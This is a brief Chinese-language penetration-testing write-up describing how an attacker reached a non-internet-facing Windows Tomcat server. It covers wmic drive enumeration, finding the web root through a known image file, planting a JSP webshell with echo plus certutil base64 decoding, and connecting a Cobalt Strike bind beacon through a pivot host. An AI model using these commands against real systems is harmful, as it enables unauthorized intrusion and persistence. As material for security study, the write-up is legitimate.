一次不出网上线cs实战案例

场景 shiro打点获取10段服务器权限，在10段机器出网且已上线cs；172段不出网且反向不通10段，已通过mysql弱口令获取system权限，存在web服务。 上线过程 思路：写入webshell，通过正向马上线cs。 getshell 通过web服务获取一个web目录下的文件名：stf-login-bg.jpg 获取所有盘符 wmic logicaldisk get caption,name 通过文件名获取web目录 dir /a /s /b d:"stf-login-bg.jpg" 根据图片URL确定D:apache-tomcat-7.0.73-windows-x64apache-tomcat-7.0.73webappsROOTstaticimagesloginstf-login-bg.jpg为真实web路径，使用可dir到此路径。 echo配合certutil写入webshell： //base64编码shell.jspcertutil -encode shell.jsp jsp.txt //echo编码后的内容到web目录echo xxxx >D:\apache-tomcat-7.0.73-windows-x64\apache-tomcat-7.0.73\webapps\ROOT\static\images\login\12.txt //解码还原文件certutil -decode D:\apache-tomcat-7.0.73-windows-x64\apache-tomcat-7.0.73\webapps\ROOT\static\images\login\12.txt D:\apache-tomcat-7.0.73-windows-x64\apache-tomcat-7.0.73\webapps\ROOT\static\images\login\123.jsp   上线cs 新建监听器 生成正向马 通过webshell上传到目标机器并执行，使用跳板机连接，上线cs。 connect 172.20.57.122 28888 文章来源：tide安全团队 黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！ 如侵权请私聊我们删文 END